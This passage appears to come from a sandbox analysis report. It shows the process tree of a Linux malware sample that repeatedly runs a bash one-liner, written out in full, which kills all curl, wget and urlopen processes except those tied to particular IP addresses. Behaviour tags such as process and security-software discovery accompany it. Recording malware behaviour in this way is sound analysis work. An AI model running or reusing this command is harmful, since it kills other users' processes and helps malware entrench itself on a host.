    PID:2936
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2937
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2938
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2939
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2941
- - /usr/bin/grep
    grep -v 192.227.90
    3⤵
    PID:2940
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2942
- - /usr/bin/grep
    grep curl
    3⤵
    PID:2943
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2944
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2945
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2947
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2946
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2948
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2949
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2950
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2951
- - /usr/bin/grep
    grep wget
    3⤵
    PID:2952
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2953
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2954
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2955
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2956
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2957
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2958
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2959
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2960
- - /usr/bin/grep
    grep urlopen
    3⤵
    PID:2961
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2962
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2963
- /usr/bin/bash
  bash -c "ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v '192.227.90' | grep -v iosk | grep -v g4mm4 | grep 'curl' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'wget' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v '202.28.229.174' | grep -v grep | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'urlopen' | awk '{print \$2}' | xargs -i kill -9 {}"
  2⤵
  PID:2964
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2965
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2966
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2967
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2968
- - /usr/bin/grep
    grep -v 192.227.90
    3⤵
    PID:2969
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2970
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2971
- - /usr/bin/grep
    grep curl
    3⤵
    PID:2972
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2973
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2974
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2975
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2976
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2977
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2978
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2979
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2980
- - /usr/bin/grep
    grep wget
    3⤵
    PID:2981
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2982
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2983
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2984
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2985
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2986
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2987
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2988
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2989
- - /usr/bin/grep
    grep urlopen
    3⤵
    PID:2990
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2991
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2992
- /usr/bin/bash
  bash -c "ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v '192.227.90' | grep -v iosk | grep -v g4mm4 | grep 'curl' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'wget' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v '202.28.229.174' | grep -v grep | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'urlopen' | awk '{print \$2}' | xargs -i kill -9 {}"
  2⤵
  - Security Software Discovery
  PID:2993
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2994
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2995
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2996
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2997
- - /usr/bin/grep
    grep -v 192.227.90
    3⤵
    PID:2998
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2999
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3000
- - /usr/bin/grep
    grep curl
    3⤵
    PID:3001
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3002
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3003
- - /usr/bin/ps
    ps aux
    3⤵
    - Process Discovery
    PID:3004
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3005
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3006
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3007
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3008
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3009
- - /usr/bin/grep
    grep wget
    3⤵
    PID:3010
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3011
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3012
- - /usr/bin/ps
    ps aux
    3⤵
    PID:3013
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3014
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3015
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3016
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3017
- - /usr/bin/grep
    grep urlopen
    3⤵
    PID:3019
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3020
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3018
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3021
- /usr/bin/bash
  bash -c "ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v '192.227.90' | grep -v iosk | grep -v g4mm4 | grep 'curl' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'wget' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v '202.28.229.174' | grep -v grep | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'urlopen' | awk '{print \$2}' | xargs -i kill -9 {}"
  2⤵
  PID:3022
- - /usr/bin/ps
    ps aux
    3⤵
    PID:3023
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3024
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3025
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3026
- - /usr/bin/grep
    grep -v 192.227.90
    3⤵
    PID:3027
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3028
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3029
- - /usr/bin/grep
    grep curl
    3⤵
    PID:3030
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3031
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3032
- - /usr/bin/ps
    ps aux
    3⤵
    PID:3033
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3034
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3035
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3036
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3037
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3038
- - /usr/bin/grep
    grep wget
    3⤵
    PID:3039
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3040
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3041
- - /usr/bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:3042
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3043
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3044
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3045
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3046
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3048
- - /usr/bin/grep
    grep urlopen
    3⤵
    PID:3049
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3050
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3053
- /usr/bin/bash
  bash -c "ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v '192.227.90' | grep -v iosk | grep -v g4mm4 | grep 'curl' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'wget' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v '202.28.229.174' | grep -v grep | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'urlopen' | awk '{print \$2}' | xargs -i kill -9 {}"
  2⤵
  PID:3057
- - /usr/bin/ps
    ps aux
    3⤵
    - Enumerates kernel/hardware configuration
    PID:3058
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3059
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3060
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3061
- - /usr/bin/grep
    grep -v 192.227.90
    3⤵
    PID:3062
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3063
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3064
- - /usr/bin/grep
    grep curl
    3⤵
    PID:3065
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3066
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3067
- - /usr/bin/ps
    ps aux
    3⤵
    PID:3068
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3069
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3070
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3071
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3072
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3073
- - /usr/bin/grep
    grep wget
    3⤵
    PID:3074
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3075
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3076
- - /usr/bin/ps
    ps aux
    3⤵
    PID:3077
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3078
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3079
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3080
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3082
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3081
- - /usr/bin/grep
    grep urlopen
    3⤵
    PID:3083
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3084
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3085
- /usr/bin/bash
  bash -c "ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v '192.227.90' | grep -v iosk | grep -v g4mm4 | grep 'curl' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'wget' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v '202.28.229.174' | grep -v grep | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'urlopen' | awk '{print \$2}' | xargs -i kill -9 {}"
  2⤵
  PID:3086
- - /usr/bin/ps
    ps aux
    3⤵
    PID:3087
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3088
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3089
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3090
- - /usr/bin/grep
    grep -v 192.227.90
    3⤵
    PID:3091
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3092
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3093
- - /usr/bin/grep
    grep curl
    3⤵
    PID:3094
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3095
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3096
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3098
- - /usr/bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:3097
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3099
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3100
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3101
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3102
- - /usr/bin/grep
    grep wget
    3⤵
    PID:3103
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3104
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3105
- - /usr/bin/ps
    ps aux
    3⤵
    PID:3106
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3107
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3108
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3109
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3110
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3111
- - /usr/bin/grep
    grep urlopen
    3⤵
    PID:3112
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3113
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3114
- /usr/bin/bash
  bash -c "ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v '192.227.90' | grep -v iosk | grep -v g4mm4 | grep 'curl' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'wget' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v '202.28.229.174' | grep -v grep | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'urlopen' | awk '{print \$2}' | xargs -i kill -9 {}"
  2⤵
  PID:3115
- - /usr/bin/ps
    ps aux
    3⤵
    PID:3116
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3117
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3118
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3119
- - /usr/bin/grep
    grep -v 192.227.90
    3⤵
    PID:3120
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3121
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3122
- - /usr/bin/grep
    grep curl
    3⤵
    PID:3123
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3124
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3125
- - /usr/bin/ps
    ps aux
    3⤵
    - Process Discovery
    PID:3126
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3127
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3128
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3129
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3130
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3131
- - /usr/bin/grep
    grep wget
    3⤵
    PID:3132
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3133
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3134
- - /usr/bin/ps
    ps aux
    3⤵
    PID:3135
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3136
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3137
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3138
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3139
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3140
- - /usr/bin/grep
    grep urlopen
    3⤵
    PID:3141
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3142
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3143
- /usr/bin/bash
  bash -c "ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v '192.227.90' | grep -v iosk | grep -v g4mm4 | grep 'curl' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'wget' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v '202.28.229.174' | grep -v grep | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'urlopen' | awk '{print \$2}' | xargs -i kill -9 {}"
  2⤵
  PID:3144
- - /usr/bin/ps
    ps aux
    3⤵
    PID:3145
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3146
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3147
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3148
- - /usr/bin/grep
    grep -v 192.227.90
    3⤵
    PID:3149
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3150
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3151
- - /usr/bin/grep
    grep curl
    3⤵
    PID:3152
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3153
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3154
- - /usr/bin/ps
    ps aux
    3⤵
    PID:3155
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3156
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3157
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3158
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3159
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3160
- - /usr/bin/grep
    grep wget
    3⤵
    PID:3161
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3162
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3163
- - /usr/bin/ps
    ps aux
    3⤵
    PID:3164
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3165
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3166
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3168
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3167
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3169
- - /usr/bin/grep
    grep urlopen
    3⤵
    PID:3170
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3171
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3172
- /usr/bin/bash
  bash -c "ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v '192.227.90' | grep -v iosk | grep -v g4mm4 | grep 'curl' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'wget' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v '202.28.229.174' | grep -v grep | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'urlopen' | awk '{print \$2}' | xargs -i kill -9 {}"
  2⤵
  PID:3173
- - /usr/bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:3174
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3175
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3176
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3177
- - /usr/bin/grep
    grep -v 192.227.90
    3⤵
    PID:3178
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3179
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3180
- - /usr/bin/grep
    grep curl
    3⤵
    PID:3181
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3182
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3183
- - /usr/bin/ps
    ps aux
    3⤵
    PID:3184
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3185
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3186
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3187
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3188
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3189
- - /usr/bin/grep
    grep wget
    3⤵
    PID:3190
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3191
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3192
- - /usr/bin/ps
    ps aux
    3⤵
    PID:3193
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3194
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3195
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3196
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3197
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3198
- - /usr/bin/grep
    grep urlopen
    3⤵
    PID:3199
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3200
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3201
- /usr/bin/bash
  bash -c "ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v '192.227.90' | grep -v iosk | grep -v g4mm4 | grep 'curl' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'wget' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v '202.28.229.174' | grep -v grep | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'urlopen' | awk '{print \$2}' | xargs -i kill -9 {}"
  2⤵
  - Security Software Discovery
  PID:3202
- - /usr/bin/ps
    ps aux
    3⤵
    PID:3203
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3204
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3206
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3205
- - /usr/bin/grep
    grep -v 192.227.90
    3⤵
    PID:3207
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3208
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3209
- - /usr/bin/grep
    grep curl
    3⤵
    PID:3210
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3211
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3212
- - /usr/bin/ps
    ps aux
    3⤵
    PID:3213
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3214
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3215
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3216
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3217
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3218
- - /usr/bin/grep
    grep wget
    3⤵
    PID:3219
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3220
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3221
- - /usr/bin/ps
    ps aux
    3⤵
    - Checks CPU configuration
    PID:3222
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3223
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3224
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3225
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3226
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3227
- - /usr/bin/grep
    grep urlopen
    3⤵
    PID:3228
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3229
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3230
- /usr/bin/bash
  bash -c "ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v '192.227.90' | grep -v iosk | grep -v g4mm4 | grep 'curl' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'wget' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v '202.28.229.174' | grep -v grep | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'urlopen' | awk '{print \$2}' | xargs -i kill -9 {}"
  2⤵
  PID:3231
- - /usr/bin/ps
    ps aux
    3⤵
    PID:3232
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3233
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3234
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3235
- - /usr/bin/grep
    grep -v 192.227.90
    3⤵
    PID:3236
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3237
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3238
- - /usr/bin/grep
    grep curl
    3⤵
    PID:3239
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3240
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3241
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3243
- - /usr/bin/ps
    ps aux
    3⤵
    PID:3242
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3244
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3245
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3246
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3247
- - /usr/bin/grep
    grep wget
    3⤵
    PID:3248
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3249
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3250
- - /usr/bin/ps
    ps aux
    3⤵
    - Enumerates kernel/hardware configuration
    PID:3251
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3252
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3253
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3254
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3255
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3256
- - /usr/bin/grep
    grep urlopen
    3⤵
    PID:3257
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3258
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3259
- /usr/bin/bash
  bash -c "ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v '192.227.90' | grep -v iosk | grep -v g4mm4 | grep 'curl' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'wget' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v '202.28.229.174' | grep -v grep | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'urlopen' | awk '{print \$2}' | xargs -i kill -9 {}"
  2⤵
  PID:3260
- - /usr/bin/ps
    ps aux
    3⤵
    PID:3261
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3263
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3262
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3264
- - /usr/bin/grep
    grep -v 192.227.90
    3⤵
    PID:3265
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3267
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3266
- - /usr/bin/grep
    grep curl
    3⤵
    PID:3268
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3269
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3270
- - /usr/bin/ps
    ps aux
    3⤵
    PID:3271
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3272
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3273
- - /usr/bin/grep
